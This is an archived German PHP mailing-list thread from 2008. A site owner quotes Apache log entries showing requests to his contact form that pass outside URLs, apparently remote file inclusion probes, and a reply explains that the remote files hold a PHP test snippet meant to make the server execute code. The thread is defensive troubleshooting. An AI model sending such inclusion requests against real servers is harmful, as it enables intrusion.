phpbar.de logo

Mailinglisten-Archive

[php] apache log einträge

[php] apache log einträge

Yannik Hampe yannik at cipher-code.de
Mon Feb 4 14:04:41 CET 2008



Silvio Siefke wrote:
> Mahlzeit,
> 
> 
> 
> ich habe vermehr Logeinträge wie folgt zu lesen:
> 
> <code>
> 209.59.163.226 - - [04/Feb/2008:07:14:43 +0100] "GET
> /kontakt.php?http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2Fpic%2Fbezefi%2Fugoye%2F 
> HTTP/1.0" 200 7218
> 209.59.163.226 - - [04/Feb/2008:07:14:44 +0100] "GET
> /kontakt.php?http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F 
> HTTP/1.0" 200 7218
> 209.59.163.226 - - [04/Feb/2008:07:14:44 +0100] "GET
> /kontakt.php?http%3A%2F%2Fwww.alonsaunet.com%2Fwebmaster%2Fromi%2Fjirudog%2F 
> HTTP/1.0" 200 7218
> </code>
> 
> Hat das irgendetwas besonderes zu sagen.

Ja: Irgendwer versucht irgend einen Mist mit deinem Formular anzustellen.

> 
> 
> Meine PHP Installation habe ich wie nachfolgend "gesichert".
> "http://www.strassenprogrammierer.de/php-absichern-hacker_tipp_497.html"

Das ist wohl eher die Anleitung für den Systemadministrator zu 
Schadensminimierung, falls der php-Programmierer unsicheren Code 
schreibt. Durchaus wichtig, aber wie deine kontakt.php aussieht ist viel 
wichtiger.

Die übergebenen URLs enthalten den Text
<?php echo md5("just_a_test");?>
Es wird wohl darum gehen deinen Server dazu zu bringen diesen Code 
auszuführen.
Mir ist aktuell nicht ganz klar, wie dermaßen schlecht dein Code sein 
muss, damit dieser Angriff funktioniert... Es sei denn der Code baut auf 
einer (ehemaligen) Sicherheitslücke in php auf...
> 
> OpenBasedir ist nicht möglich, weil Maia und Squirrelmail ein wenig am 
> schimpfen sind.
> 
> Würde mich über Rat freuen.
> 
> Debian Etch
> PHP/4.4.4-8+etch4
> Apache 1.3.34
> 
> 
> MFG
> Silvio

Yannik

php::bar PHP Wiki   -   Listenarchive